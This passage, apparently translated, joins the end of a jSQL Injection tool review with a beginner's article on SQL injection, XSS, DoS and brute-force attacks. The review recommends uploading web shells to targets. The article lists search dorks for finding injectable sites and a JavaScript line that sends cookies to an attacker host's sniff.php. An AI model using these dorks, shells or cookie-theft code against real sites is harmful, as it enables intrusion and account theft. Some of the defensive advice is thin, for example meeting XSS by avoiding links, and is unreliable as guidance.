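print(guess_os("Apache/2.4.17 (Win64) PHP/7.0.0RC6"))  # Windows (64-bit)
print(guess_os("Apache/2.2.31 (Unix)"))                # Unix-like (*BSD, Linux)
```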

    On Windows, a typical site folder is C:\Server\data\htdocs\. But if someone "thought" of running a server on Windows, then very likely this person has not heard anything about privileges. Therefore, it is worth trying the C:\Windows\ directory directly:

    As you can see, everything went perfectly the first time.

    But the shells bundled with jSQL Injection raise my doubts. If you have file privileges, you may as well upload something with a web interface of your own.

    8. Bulk checking sites for SQL injections

    And even jSQL Injection has this feature. Everything is extremely simple - upload a list of sites (can be imported from a file), select those that you want to check and click the appropriate button to start the operation.

    Verdict on jSQL Injection

    jSQL Injection is a good, powerful tool for finding and then using SQL injections found on sites. Its undoubted advantages: ease of use, built-in related functions. jSQL Injection can be a beginner's best friend when analyzing websites.

    Among the shortcomings, I would note the impossibility of editing databases (at least I did not find this functionality). As with all GUI tools, the inability to use the program in scripts can also be counted as a disadvantage. Nevertheless, some automation is possible here too, thanks to the built-in bulk site check.

    jSQL Injection is much more convenient to use than sqlmap. But sqlmap supports more kinds of SQL injection, offers options for working with files and bypassing firewalls, and has some other features.

    Bottom line: jSQL Injection is a beginner hacker's best friend.

    You can find help for this program in the Kali Linux Encyclopedia on this page: http://kali.tools/?p=706

    I decided to talk a little about information security. The article will be useful for novice programmers and those who have just started doing Frontend development. What is the problem?

    Many novice developers get so carried away with writing code that they completely forget about the security of their work. Most importantly, they forget about vulnerabilities such as SQL injection and XSS. They also come up with easy passwords for their administrative panels and fall victim to brute force. What are these attacks and how can they be avoided?

    SQL injection

    SQL injection is the most common type of attack on a database, carried out through an SQL query to a specific DBMS. Many people and even large companies suffer from such attacks. The cause is a developer's mistake in designing the database and, in fact, in writing the SQL queries.

    An SQL injection attack is possible due to incorrect processing of input data used in SQL queries. If a hacker's attack succeeds, you risk losing not only the contents of the databases but also the logins and passwords of the administrative panel. And that data is quite enough to completely take over the site or make irreversible changes to it.
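The root cause - user input glued straight into a query string - fits in a few lines. This sketch uses SQLite as a stand-in for any DBMS; the table and the payload are invented for the demonstration:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'secret')")

user_input = "' OR '1'='1"  # classic injection payload

# VULNERABLE: the payload rewrites the WHERE clause and matches every row.
unsafe = "SELECT login FROM users WHERE login = '%s'" % user_input
print(conn.execute(unsafe).fetchall())  # [('admin',)] - injection succeeded

# SAFE: a parameterized query treats the input as plain data, not SQL.
safe = "SELECT login FROM users WHERE login = ?"
print(conn.execute(safe, (user_input,)).fetchall())  # [] - nothing matches
```

The safe variant is the standard defense: the DBMS driver binds the value separately from the query text, so no input can change the query's structure.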

    The attack can be successfully reproduced against scripts written in PHP, ASP, Perl and other languages. The success of such attacks depends largely on which DBMS is used and how the script itself is implemented. There are a lot of sites in the world vulnerable to SQL injection, and this is easy to verify: it is enough to enter "dorks" - special queries for finding vulnerable sites. Here are some of them:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:buy.php?category=
    • inurl:article.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:page.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:article.php?id=

    How do you use them? Just enter them into the Google or Yandex search engine. The search engine will return not merely a vulnerable site, but a direct link to the vulnerable page. But we will not stop there: let's make sure the page is really vulnerable. To do so, it is enough to put a single quote "'" after the value "id=1", something like this:

    • inurl:games.php?id=1'

    And the site responds with an SQL query error. What does our hacker need next?

    He needs that very link to the error page. Then, in most cases, work on the vulnerability takes place in the Kali Linux distribution with its utilities: injecting the code and performing the necessary operations. How exactly this happens, I cannot tell you here, but you can find information about it on the Internet.
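The quote test above boils down to looking for DBMS error signatures in the response. A sketch of that check (the signature list is a small sample, and the simulated response body is invented; a real scanner would fetch the page over HTTP and knows hundreds of patterns):

```python
# Common DBMS error signatures that betray an injectable parameter.
SQL_ERROR_SIGNS = [
    "You have an error in your SQL syntax",      # MySQL
    "Warning: mysql_fetch",                      # PHP + MySQL
    "ORA-00921: unexpected end of SQL command",  # Oracle
    "Microsoft OLE DB Provider for SQL Server",  # MSSQL
]

def looks_injectable(page_text):
    # True if any known error signature appears in the response body.
    return any(sign in page_text for sign in SQL_ERROR_SIGNS)

# Simulated body returned after appending ' to the id parameter
body = "Warning: mysql_fetch_array() expects parameter 1 to be resource"
print(looks_injectable(body))                 # True
print(looks_injectable("<h1>All good</h1>"))  # False
```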

    XSS Attack

    This type of attack targets cookies, which users are very fond of keeping. Why not? How could we do without them? After all, thanks to cookies, we do not type in the password for Vk.com or Mail.ru a hundred times, and few people refuse them. But on the Internet a rule often applies for hackers: the convenience factor is directly proportional to the insecurity factor.

    To carry out an XSS attack, our hacker needs to know JavaScript. At first glance the language is very simple and harmless, since it has no access to computer resources: a hacker can only work with JavaScript inside the browser. But that is enough, because the main thing is to get the code into the web page.

    I won't go into detail about the attack process. I will tell only the basics and the meaning of how this happens.

    A hacker can add JS code to some forum post or guestbook entry.

    The script redirects us to an infected page where the code is executed: be it a sniffer, some kind of storage, or an exploit that will one way or another steal our cookies.

    Why JavaScript? Because JavaScript handles web requests well and has access to cookies. But if our script redirects the user to some site, he will easily notice it. So the hacker uses a more cunning option: he simply embeds the code in a picture.

    var img = new Image();

    img.src = "http://192.168.1.7/sniff.php?" + document.cookie;

    We simply create an image and assign our script to it as an address.

    How to protect yourself from all this? Very simple - do not follow suspicious links.

    DoS and DDoS Attacks


    DoS (from the English Denial of Service) is a hacker attack on a computer system intended to bring it to failure: creating conditions under which legitimate users of the system cannot access its resources (servers), or access is made difficult. The failure of a system can also be a step towards taking it over if, in an emergency, the software reveals critical information: for example, the version or a fragment of the program code. But most often it is a means of economic pressure: downtime of a revenue-generating service and the provider's bills hit the target hard in the pocket. DoS and DDoS attacks are currently the most popular, since they allow almost any system to be brought down without leaving legally significant evidence.

    What is the difference between DoS and DDoS attacks?

    DoS is a cleverly crafted attack. For example, if a server does not check the validity of incoming packets, a hacker can craft a request that takes forever to process, leaving no processor time for other connections. Clients accordingly get a denial of service. But large, well-known sites cannot be overloaded or knocked out this way: they are armed with wide channels and super-powerful servers that easily cope with such a load.

    DDoS is essentially the same attack as DoS. But while DoS comes from a single attacking source, in a DDoS there may well be hundreds or more of them. Even heavy-duty servers may be unable to cope with such an overload. Let me give an example.

    A DoS attack is when you are having a conversation and some ill-mannered person walks up and starts shouting loudly: talking is either impossible or very difficult. The solution is to call security, who will calm the person down and escort him out. A DDoS attack is when thousands of such ill-mannered people run in - here the guards will not be able to twist everyone's arms and drag them all away.

    DoS and DDoS attacks are launched from so-called zombie computers: users' machines hacked by hackers, whose owners do not even suspect that they are participating in an attack on some server.

    How to protect yourself from this? In general, there is no way, but you can make the hacker's task harder by choosing a good hosting provider with powerful servers.

    Brute force attack

    A developer can build many protection systems against attacks, thoroughly review the scripts he has written, and check the site for vulnerabilities. But at the very last step of putting the site together - when setting the password for the admin panel - he can forget about one thing. The password itself!

    Setting a simple password is strongly discouraged: 12345, 1114457, vasya111, and the like. Do not set passwords shorter than 10-11 characters, or you may fall victim to the most common and uncomplicated attack - brute force.

    Brute force is a dictionary-based password-guessing attack carried out by special programs. Dictionaries vary: Latin letters, numbers up to some range, mixed (letters plus numbers), and there are even dictionaries with special characters such as @#4$%&*~`'"\?.

    Of course, this type of attack is easy to avoid: just come up with a complex password. Even a captcha can save you, and if your site runs on a CMS, many of them detect this kind of attack and block the IP. Always remember: the more varied the characters in a password, the harder it is to guess.

    How do hackers work? In most cases they suspect or already know part of the password. It is logical to assume that a user's password certainly does not consist of 3 or 5 characters - such passwords lead to frequent break-ins. So hackers take a range of 5 to 10 characters and add the few characters they probably already know. Then they generate passwords in the desired ranges; the Kali Linux distribution even has programs for such cases. And voila - the attack no longer takes long, since the dictionary is no longer so large. In addition, a hacker can harness the power of a video card: some support CUDA, speeding up enumeration by as much as 10 times. As you can see, such a simple attack is quite real. And sites are not the only targets of brute force.
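The arithmetic behind all this advice is simple: the number of candidates a brute-forcer must try grows as alphabet_size ** length, so every extra character class and every extra position multiplies the attacker's work. A quick calculation:

```python
def keyspace(alphabet_size, length):
    # Total candidates a brute-forcer must try in the worst case.
    return alphabet_size ** length

print(keyspace(26, 5))   # 5 lowercase letters: 11,881,376 candidates
print(keyspace(62, 10))  # 10 letters + digits: about 8.4e17 candidates
```

This is why knowing even a few characters of the password in advance, as described above, shrinks the search so dramatically.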

    Dear developers, never forget about information security, because today many people, and even states, suffer from these kinds of attacks. After all, the biggest vulnerability is the human being, who can always be distracted or miss something. We are programmers, not programmed machines. Stay alert: the loss of information threatens serious consequences!